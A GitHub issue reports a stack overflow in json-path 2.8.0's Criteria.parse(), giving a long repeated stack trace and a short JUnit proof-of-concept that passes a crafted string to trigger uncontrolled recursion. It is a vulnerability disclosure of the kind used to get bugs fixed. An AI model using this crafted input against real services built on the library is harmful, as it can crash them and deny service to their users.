Stack Overflow (Criteria.parse()) #969

PoppingSnack · 2023-11-27T03:19:29Z

Stack Overflow

Description

A stack overflow vulnerability exists in the Criteria.parse() method in json-path 2.8.0. Specially crafted input can cause uncontrolled recursion, resulting in stack overflow.

Error Log

java.lang.StackOverflowError
	at com.jayway.jsonpath.internal.CharacterIndex.subSequence(CharacterIndex.java:286)
	at com.jayway.jsonpath.internal.path.PathCompiler.readPropertyOrFunctionToken(PathCompiler.java:249)
	at com.jayway.jsonpath.internal.path.PathCompiler.readNextToken(PathCompiler.java:153)
	at com.jayway.jsonpath.internal.path.PathCompiler.readBracketPropertyToken(PathCompiler.java:634)
	at com.jayway.jsonpath.internal.path.PathCompiler.readNextToken(PathCompiler.java:137)
	at com.jayway.jsonpath.internal.path.PathCompiler.readPropertyOrFunctionToken(PathCompiler.java:256)
	at com.jayway.jsonpath.internal.path.PathCompiler.readNextToken(PathCompiler.java:153)
	at com.jayway.jsonpath.internal.path.PathCompiler.readBracketPropertyToken(PathCompiler.java:634)
	at com.jayway.jsonpath.internal.path.PathCompiler.readNextToken(PathCompiler.java:137)
	at com.jayway.jsonpath.internal.path.PathCompiler.readPropertyOrFunctionToken(PathCompiler.java:256)
	at com.jayway.jsonpath.internal.path.PathCompiler.readNextToken(PathCompiler.java:153)
	at com.jayway.jsonpath.internal.path.PathCompiler.readBracketPropertyToken(PathCompiler.java:634)
	at com.jayway.jsonpath.internal.path.PathCompiler.readNextToken(PathCompiler.java:137)
	at com.jayway.jsonpath.internal.path.PathCompiler.readPropertyOrFunctionToken(PathCompiler.java:256)
	at com.jayway.jsonpath.internal.path.PathCompiler.readNextToken(PathCompiler.java:153)
	at com.jayway.jsonpath.internal.path.PathCompiler.readBracketPropertyToken(PathCompiler.java:634)
	at com.jayway.jsonpath.internal.path.PathCompiler.readNextToken(PathCompiler.java:137)
	at com.jayway.jsonpath.internal.path.PathCompiler.readPropertyOrFunctionToken(PathCompiler.java:256)
	at com.jayway.jsonpath.internal.path.PathCompiler.readNextToken(PathCompiler.java:153)
	at com.jayway.jsonpath.internal.path.PathCompiler.readBracketPropertyToken(PathCompiler.java:634)
	at com.jayway.jsonpath.internal.path.PathCompiler.readNextToken(PathCompiler.java:137)
	at com.jayway.jsonpath.internal.path.PathCompiler.readPropertyOrFunctionToken(PathCompiler.java:256)
	at com.jayway.jsonpath.internal.path.PathCompiler.readNextToken(PathCompiler.java:153)
	at com.jayway.jsonpath.internal.path.PathCompiler.readBracketPropertyToken(PathCompiler.java:634)
	at com.jayway.jsonpath.internal.path.PathCompiler.readNextToken(PathCompiler.java:137)
	at com.jayway.jsonpath.internal.path.PathCompiler.readPropertyOrFunctionToken(PathCompiler.java:256)
	at com.jayway.jsonpath.internal.path.PathCompiler.readNextToken(PathCompiler.java:153)
	at com.jayway.jsonpath.internal.path.PathCompiler.readBracketPropertyToken(PathCompiler.java:634)
	at com.jayway.jsonpath.internal.path.PathCompiler.readNextToken(PathCompiler.java:137)

PoC

<dependency>
<groupId>com.jayway.jsonpath</groupId>
<artifactId>json-path</artifactId>
<version>2.8.0</version>
</dependency>

import com.jayway.jsonpath.Criteria;
import org.junit.Test;

/**
 * https://github.com/json-path/JsonPath
 * com.jayway.jsonpath:json-path:2.8.0
 */
public class CriteriaFuzzerParse {
    // Stack overflow
    @Test
    public void parseFuzzerTest() {
        try {
            Criteria result = Criteria.parse("@[\"\",/\\");
        } catch (Exception e) {
        }
    }
}

The text was updated successfully, but these errors were encountered:

PoppingSnack changed the title ~~Stack Overflow~~ Stack Overflow (Criteria.parse()) Nov 27, 2023

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Stack Overflow (Criteria.parse()) #969

Stack Overflow (Criteria.parse()) #969

PoppingSnack commented Nov 27, 2023

Stack Overflow (Criteria.parse()) #969

Stack Overflow (Criteria.parse()) #969

Comments

PoppingSnack commented Nov 27, 2023

Stack Overflow

Description

Error Log

PoC